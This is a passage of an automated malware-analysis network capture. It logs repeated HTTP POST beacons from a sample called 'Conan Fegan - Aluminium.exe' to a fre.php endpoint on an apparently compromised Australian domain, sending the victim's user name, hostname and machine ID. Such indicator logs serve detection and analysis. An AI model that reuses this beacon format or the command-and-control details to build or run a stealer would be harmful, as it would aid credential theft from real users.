                                          Date: Mon, 22 Feb 2021 18:13:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          30192.168.2.449790203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:42.586766958 CET2468OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:42.921735048 CET2500OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:43.288108110 CET2500INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          31192.168.2.449792203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:43.872009993 CET2501OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:44.207918882 CET2502OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:44.576299906 CET2502INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          32192.168.2.449793203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:45.134991884 CET2503OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:45.470527887 CET2503OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:45.838083982 CET2504INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          33192.168.2.449794203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:46.448703051 CET2505OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:46.795232058 CET2505OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:47.172113895 CET2505INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          34192.168.2.449795203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:47.761298895 CET2506OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:48.099041939 CET2506OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:48.467871904 CET2507INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          35192.168.2.449796203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:49.047257900 CET2508OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:49.382508039 CET2508OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:49.748456955 CET2508INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          36192.168.2.449797203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:50.324886084 CET2509OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:50.663357019 CET2509OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:51.031461954 CET2510INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          37192.168.2.449798203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:51.622675896 CET2511OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:51.961210966 CET2511OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:52.330063105 CET2511INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          38192.168.2.449799203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:52.940188885 CET2512OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:53.276652098 CET2512OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:53.654052973 CET2513INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          39192.168.2.449800203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:54.217315912 CET2528OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:54.554219961 CET2567OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:54.922338009 CET2570INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.449751203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:07.581440926 CET1539OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:07.923393965 CET1539OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:08.297547102 CET1539INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          40192.168.2.449804203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:55.493777990 CET2576OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:55.828850985 CET2579OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:56.195640087 CET2582INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          41192.168.2.449805203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:56.763031960 CET2587OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:57.098416090 CET2590OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:57.467051029 CET2594INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          42192.168.2.449811203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:58.050741911 CET5375OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:58.390557051 CET5451OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:58.757900953 CET5451INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          43192.168.2.449812203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:59.321820021 CET5562OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:59.665541887 CET5786OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:00.041541100 CET5787INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          44192.168.2.449813203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:00.631942034 CET6057OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:00.970818996 CET6194OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:01.344598055 CET6194INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          45192.168.2.449814203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:01.922836065 CET6195OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:02.257450104 CET6196OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:02.623399973 CET6196INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          46192.168.2.449815203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:03.230295897 CET6197OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:03.565103054 CET6197OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:03.928021908 CET6198INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          47192.168.2.449816203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:04.508068085 CET6199OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:04.845724106 CET6199OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:05.223133087 CET6199INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          48192.168.2.449817203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:05.814223051 CET6200OUTPOST /wap121/five/fre.php HTTP/1.0
